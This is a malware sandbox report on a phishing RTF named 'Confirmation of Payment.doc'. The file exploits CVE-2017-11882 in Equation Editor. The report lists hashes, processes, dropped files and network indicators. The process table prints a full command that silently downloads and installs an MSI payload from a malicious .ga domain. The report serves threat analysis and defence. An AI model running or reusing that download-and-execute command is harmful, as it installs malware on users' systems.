analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Confirmation of Payment.doc

Full analysis: https://app.any.run/tasks/8b285477-8db5-4eb0-b826-26a19a06dee3
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 18, 2019, 12:57:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
CVE-2017-11882
opendir
exe-to-msi
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

3CBF2790B1911C37FF9BB5A41688B9A0

SHA1:

1E700A98C1667166433CA29EAFB6E0B126F55522

SHA256:

A1B733600C13ABFBE874E46ECB9B0661DD0356854A0331BDEE7185952C60A357

SSDEEP:

12288:xkYSdYCwrbYINwKPkxhKMCn+Jsh6cSp8P4Tf6LJ4Y0SfiGOxmrx7DnZ6Zmj:xr3YINwKPkxhK9S+J4Y0SfiGOxmr7j

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3856)
    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 1844)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2200)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3856)
    • Executed via COM

      • EQNEDT32.EXE (PID: 544)
      • EQNEDT32.EXE (PID: 3856)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2200)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2200)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3444)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3444)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3856)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 2200)
    • Application was dropped or rewritten from another process

      • MSIEAEF.tmp (PID: 2876)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 32859
CharactersWithSpaces: 17
Characters: 17
Words: -
Pages: 1
TotalEditTime: 4 minutes
RevisionNumber: 4
ModifyDate: 2019:07:11 00:42:00
CreateDate: 2019:07:11 00:31:00
LastModifiedBy: USER
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msieaef.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
3444"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Confirmation of Payment.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3856"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1844cmd.exe & /C CD C: & msiexec.exe /i http://baladefarms.ga/a/ug.msi /qn C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2984msiexec.exe /i http://baladefarms.ga/a/ug.msi /qn C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2200C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
544"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2876"C:\Windows\Installer\MSIEAEF.tmp"C:\Windows\Installer\MSIEAEF.tmpmsiexec.exe
User:
admin
Company:
Saab
Integrity Level:
MEDIUM
Description:
Platformer
Version:
1.0.0.0
Total events
1 321
Read events
868
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
9
Unknown types
5

Dropped files

PID
Process
Filename
Type
3444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD590.tmp.cvr
MD5:
SHA256:
2200msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFDFA66F344472BA28.TMP
MD5:
SHA256:
3444WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:ED3EB052209D6630320BDB3771A7238C
SHA256:074B3392AD68C30AE61F651A7B98F81EB63506B6AE032A6C86D1171260F0C192
2200msiexec.exeC:\Windows\Installer\MSIEAEF.tmpexecutable
MD5:615301A029ACD439972632B04FA37C59
SHA256:85F327FAC8ABCF95BCA4FFCBBA8EF44C4B07329705CD8C7A542CD59F1E4BD515
2200msiexec.exeC:\Windows\Installer\17e8f9.ipibinary
MD5:87B6B2C449A8C8E26EA24BA406434746
SHA256:94020F18131B39DD7DDC2B9683C2734EF52224981B7E945C41AB15A3CC19FBA8
2200msiexec.exeC:\Windows\Installer\MSIE0DA.tmpexecutable
MD5:A0ACF62998163BEE83807F7A0E6A066B
SHA256:2A7765D452D9D1657F0D39A03CD1D94881423A0A98379AC6AF2B08B2CD1939A3
2200msiexec.exeC:\Windows\Installer\MSIE996.tmpbinary
MD5:2B5E5D9D85BADE23512C2A0FF99A9A23
SHA256:68AC9C2EB257EBDDBC3813B8E8FA084A04DCEE77C90A30FF2857A2CD75BFED05
3444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$nfirmation of Payment.docpgc
MD5:3C09E0D94CBEC61A9B236F7DFCA0E5D0
SHA256:448D3E7464D0BD176610C63156E74D9FF9AF83054D5F50CEE136E52AA7327EDA
2200msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:E206699D7781709D9154ABF4879E2CF5
SHA256:A409E8B8A04198E21EF575BB91FC68FE7F739A681DF63A6DA4EDC04A19233279
2200msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\desktop.iniini
MD5:BA96961F5E22882527919E19DAEA510F
SHA256:DACE5AD59099429D8AED4EE279F1263EFB65D64456931398465A396CF0E79BD7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2200
msiexec.exe
GET
200
198.54.125.61:80
http://baladefarms.ga/a/ug.msi
US
executable
1008 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2200
msiexec.exe
198.54.125.61:80
baladefarms.ga
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
baladefarms.ga
  • 198.54.125.61
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ga Domain
2200
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2200
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2200
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info